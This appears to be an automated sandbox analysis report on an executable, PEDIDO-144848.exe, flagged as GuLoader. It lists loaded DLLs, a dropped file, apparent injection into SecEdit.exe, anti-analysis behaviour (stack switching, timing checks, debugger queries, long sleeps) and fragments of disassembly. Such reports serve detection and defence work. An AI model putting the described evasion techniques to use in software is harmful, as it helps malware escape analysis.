        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: scecli.dllJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeFile written: C:\Program Files (x86)\Fljtenists.iniJump to behavior
        Source: PEDIDO-144848.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: SecEdit.pdb source: PEDIDO-144848.exe, 00000002.00000003.115513057373.0000000006BE0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: PEDIDO-144848.exe, 00000002.00000001.115003799007.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: SecEdit.pdbGCTL source: PEDIDO-144848.exe, 00000002.00000003.115513057373.0000000006BE0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: PEDIDO-144848.exe, 00000002.00000003.115463317086.0000000036A24000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115459604949.000000003687C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: PEDIDO-144848.exe, PEDIDO-144848.exe, 00000002.00000003.115463317086.0000000036A24000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115459604949.000000003687C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe
        Source: Binary string: mshtml.pdbUGP source: PEDIDO-144848.exe, 00000002.00000001.115003799007.0000000000649000.00000020.00000001.01000000.00000006.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000002.00000002.115544134516.00000000017B8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.115152353454.0000000002ED8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C008CD push ecx; mov dword ptr [esp], ecx2_2_36C008D6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36903E36 push edi; ret 2_2_36903E38
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36910637 push esp; retf 2_2_369105D9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36904657 push ecx; ret 2_2_36904674
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36904643 push ecx; ret 2_2_36904674
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36904407 pushfd ; ret 2_2_36904408
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36900DB3 push ebx; iretd 2_2_36900DB4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_369105A8 push esp; retf 2_2_369105D9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36900DD3 push ds; ret 2_2_36900DD4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36904AD6 push esp; retf 2_2_36904AAD
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36904A18 push esp; retf 2_2_36904AAD
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_369103DF push es; iretd 2_2_369103E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_3690C8AA push esi; iretd 2_2_3690C8AD
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36915032 push eax; ret 2_2_36915034
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_369151E4 push eax; retf 0000h2_2_369156A5
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36910963 push eax; retf 2_2_36910968
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030608CD push ecx; mov dword ptr [esp], ecx4_2_030608D6
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02ED4AD6 push esp; retf 4_2_02ED4AAD
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDB2B8 push edi; retf 42F6h4_2_02EDB325
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02ED4A0A push esp; retf 4_2_02ED4AAD
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDC8AA push esi; iretd 4_2_02EDC8AD
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDB89A pushfd ; ret 4_2_02EDB8B2
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDB828 pushfd ; ret 4_2_02EDB8B2
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EE5032 push eax; ret 4_2_02EE5034
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02ED4643 push ecx; ret 4_2_02ED4674
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02ED4657 push ecx; ret 4_2_02ED4674
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02ED3E36 push edi; ret 4_2_02ED3E38
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02ED4407 pushfd ; ret 4_2_02ED4408
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02ED0DD3 push ds; ret 4_2_02ED0DD4
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02ED0DB3 push ebx; iretd 4_2_02ED0DB4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeFile created: C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeAPI/Special instruction interceptor: Address: 317A77D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeAPI/Special instruction interceptor: Address: 1A5A77D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeAPI/Special instruction interceptor: Address: 7FFE96ED0594
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeAPI/Special instruction interceptor: Address: 7FFE96ECFF74
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeAPI/Special instruction interceptor: Address: 7FFE96ECD6C4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeAPI/Special instruction interceptor: Address: 7FFE96ECD864
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFE96ECD144
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFE96ED0594
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFE96ECD764
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFE96ECD324
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFE96ECD364
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFE96ECD004
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFE96ECFF74
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFE96ECD6C4
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFE96ECD864
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C41763 rdtsc 2_2_36C41763
        Source: C:\Windows\SysWOW64\SecEdit.exeWindow / User API: threadDelayed 9852Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 881Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 877Jump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI coverage: 1.1 %
        Source: C:\Windows\SysWOW64\SecEdit.exe TID: 3104Thread sleep count: 122 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exe TID: 3104Thread sleep time: -244000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exe TID: 3104Thread sleep count: 9852 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exe TID: 3104Thread sleep time: -19704000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\SecEdit.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_00405642 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405642
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_004060A4 FindFirstFileA,FindClose,0_2_004060A4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_0040270B FindFirstFileA,0_2_0040270B
        Source: PEDIDO-144848.exe, 00000002.00000003.115460520041.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115460098433.0000000006B73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeAPI call chain: ExitProcess graph end nodegraph_0-3797
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeAPI call chain: ExitProcess graph end nodegraph_0-3977
        Source: C:\Windows\SysWOW64\SecEdit.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C41763 rdtsc 2_2_36C41763
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_00401759 lstrcatA,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatA,0_2_00401759
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CA86C2 mov eax, dword ptr fs:[00000030h]2_2_36CA86C2
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCA6C0 mov eax, dword ptr fs:[00000030h]2_2_36CCA6C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C006CF mov eax, dword ptr fs:[00000030h]2_2_36C006CF
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2D6D0 mov eax, dword ptr fs:[00000030h]2_2_36C2D6D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0C6E0 mov eax, dword ptr fs:[00000030h]2_2_36C0C6E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C056E0 mov eax, dword ptr fs:[00000030h]2_2_36C056E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C056E0 mov eax, dword ptr fs:[00000030h]2_2_36C056E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C056E0 mov eax, dword ptr fs:[00000030h]2_2_36C056E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C266E0 mov eax, dword ptr fs:[00000030h]2_2_36C266E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C266E0 mov eax, dword ptr fs:[00000030h]2_2_36C266E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7C6F2 mov eax, dword ptr fs:[00000030h]2_2_36C7C6F2
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7C6F2 mov eax, dword ptr fs:[00000030h]2_2_36C7C6F2
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10680 mov eax, dword ptr fs:[00000030h]2_2_36C10680
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10680 mov eax, dword ptr fs:[00000030h]2_2_36C10680
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10680 mov eax, dword ptr fs:[00000030h]2_2_36C10680
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10680 mov eax, dword ptr fs:[00000030h]2_2_36C10680
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10680 mov eax, dword ptr fs:[00000030h]2_2_36C10680
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10680 mov eax, dword ptr fs:[00000030h]2_2_36C10680
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10680 mov eax, dword ptr fs:[00000030h]2_2_36C10680
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10680 mov eax, dword ptr fs:[00000030h]2_2_36C10680
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10680 mov eax, dword ptr fs:[00000030h]2_2_36C10680
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10680 mov eax, dword ptr fs:[00000030h]2_2_36C10680
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10680 mov eax, dword ptr fs:[00000030h]2_2_36C10680
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10680 mov eax, dword ptr fs:[00000030h]2_2_36C10680
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBF68C mov eax, dword ptr fs:[00000030h]2_2_36CBF68C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C08690 mov eax, dword ptr fs:[00000030h]2_2_36C08690
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8C691 mov eax, dword ptr fs:[00000030h]2_2_36C8C691
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF96E0 mov eax, dword ptr fs:[00000030h]2_2_36BF96E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF96E0 mov eax, dword ptr fs:[00000030h]2_2_36BF96E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC86A8 mov eax, dword ptr fs:[00000030h]2_2_36CC86A8
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC86A8 mov eax, dword ptr fs:[00000030h]2_2_36CC86A8
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C03640 mov eax, dword ptr fs:[00000030h]2_2_36C03640
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1F640 mov eax, dword ptr fs:[00000030h]2_2_36C1F640
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1F640 mov eax, dword ptr fs:[00000030h]2_2_36C1F640
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1F640 mov eax, dword ptr fs:[00000030h]2_2_36C1F640
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3C640 mov eax, dword ptr fs:[00000030h]2_2_36C3C640
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3C640 mov eax, dword ptr fs:[00000030h]2_2_36C3C640
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C35654 mov eax, dword ptr fs:[00000030h]2_2_36C35654
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0965A mov eax, dword ptr fs:[00000030h]2_2_36C0965A
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0965A mov eax, dword ptr fs:[00000030h]2_2_36C0965A
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3265C mov eax, dword ptr fs:[00000030h]2_2_36C3265C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3265C mov ecx, dword ptr fs:[00000030h]2_2_36C3265C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3265C mov eax, dword ptr fs:[00000030h]2_2_36C3265C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C13660 mov eax, dword ptr fs:[00000030h]2_2_36C13660
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C13660 mov eax, dword ptr fs:[00000030h]2_2_36C13660
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C13660 mov eax, dword ptr fs:[00000030h]2_2_36C13660
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3666D mov esi, dword ptr fs:[00000030h]2_2_36C3666D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3666D mov eax, dword ptr fs:[00000030h]2_2_36C3666D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3666D mov eax, dword ptr fs:[00000030h]2_2_36C3666D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C00670 mov eax, dword ptr fs:[00000030h]2_2_36C00670
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42670 mov eax, dword ptr fs:[00000030h]2_2_36C42670
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42670 mov eax, dword ptr fs:[00000030h]2_2_36C42670
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C93608 mov eax, dword ptr fs:[00000030h]2_2_36C93608
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C93608 mov eax, dword ptr fs:[00000030h]2_2_36C93608
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C93608 mov eax, dword ptr fs:[00000030h]2_2_36C93608
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C93608 mov eax, dword ptr fs:[00000030h]2_2_36C93608
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C93608 mov eax, dword ptr fs:[00000030h]2_2_36C93608
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C93608 mov eax, dword ptr fs:[00000030h]2_2_36C93608
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2D600 mov eax, dword ptr fs:[00000030h]2_2_36C2D600
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2D600 mov eax, dword ptr fs:[00000030h]2_2_36C2D600
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBF607 mov eax, dword ptr fs:[00000030h]2_2_36CBF607
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3360F mov eax, dword ptr fs:[00000030h]2_2_36C3360F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CD4600 mov eax, dword ptr fs:[00000030h]2_2_36CD4600
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF7662 mov eax, dword ptr fs:[00000030h]2_2_36BF7662
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF7662 mov eax, dword ptr fs:[00000030h]2_2_36BF7662
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF7662 mov eax, dword ptr fs:[00000030h]2_2_36BF7662
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C05622 mov eax, dword ptr fs:[00000030h]2_2_36C05622
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C05622 mov eax, dword ptr fs:[00000030h]2_2_36C05622
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3C620 mov eax, dword ptr fs:[00000030h]2_2_36C3C620
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAD62C mov ecx, dword ptr fs:[00000030h]2_2_36CAD62C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAD62C mov ecx, dword ptr fs:[00000030h]2_2_36CAD62C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAD62C mov eax, dword ptr fs:[00000030h]2_2_36CAD62C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C00630 mov eax, dword ptr fs:[00000030h]2_2_36C00630
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C30630 mov eax, dword ptr fs:[00000030h]2_2_36C30630
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFD64A mov eax, dword ptr fs:[00000030h]2_2_36BFD64A
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFD64A mov eax, dword ptr fs:[00000030h]2_2_36BFD64A
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C88633 mov esi, dword ptr fs:[00000030h]2_2_36C88633
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C88633 mov eax, dword ptr fs:[00000030h]2_2_36C88633
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C88633 mov eax, dword ptr fs:[00000030h]2_2_36C88633
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3F63F mov eax, dword ptr fs:[00000030h]2_2_36C3F63F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3F63F mov eax, dword ptr fs:[00000030h]2_2_36C3F63F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBF7CF mov eax, dword ptr fs:[00000030h]2_2_36CBF7CF
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E7E0 mov eax, dword ptr fs:[00000030h]2_2_36C2E7E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C037E4 mov eax, dword ptr fs:[00000030h]2_2_36C037E4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C037E4 mov eax, dword ptr fs:[00000030h]2_2_36C037E4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C037E4 mov eax, dword ptr fs:[00000030h]2_2_36C037E4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C037E4 mov eax, dword ptr fs:[00000030h]2_2_36C037E4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C037E4 mov eax, dword ptr fs:[00000030h]2_2_36C037E4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C037E4 mov eax, dword ptr fs:[00000030h]2_2_36C037E4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C037E4 mov eax, dword ptr fs:[00000030h]2_2_36C037E4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CDB781 mov eax, dword ptr fs:[00000030h]2_2_36CDB781
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CDB781 mov eax, dword ptr fs:[00000030h]2_2_36CDB781
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C31796 mov eax, dword ptr fs:[00000030h]2_2_36C31796
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C31796 mov eax, dword ptr fs:[00000030h]2_2_36C31796
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E79D mov eax, dword ptr fs:[00000030h]2_2_36C7E79D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E79D mov eax, dword ptr fs:[00000030h]2_2_36C7E79D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E79D mov eax, dword ptr fs:[00000030h]2_2_36C7E79D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E79D mov eax, dword ptr fs:[00000030h]2_2_36C7E79D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E79D mov eax, dword ptr fs:[00000030h]2_2_36C7E79D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E79D mov eax, dword ptr fs:[00000030h]2_2_36C7E79D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E79D mov eax, dword ptr fs:[00000030h]2_2_36C7E79D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E79D mov eax, dword ptr fs:[00000030h]2_2_36C7E79D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E79D mov eax, dword ptr fs:[00000030h]2_2_36C7E79D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C007A7 mov eax, dword ptr fs:[00000030h]2_2_36C007A7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCD7A7 mov eax, dword ptr fs:[00000030h]2_2_36CCD7A7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCD7A7 mov eax, dword ptr fs:[00000030h]2_2_36CCD7A7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCD7A7 mov eax, dword ptr fs:[00000030h]2_2_36CCD7A7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CD17BC mov eax, dword ptr fs:[00000030h]2_2_36CD17BC
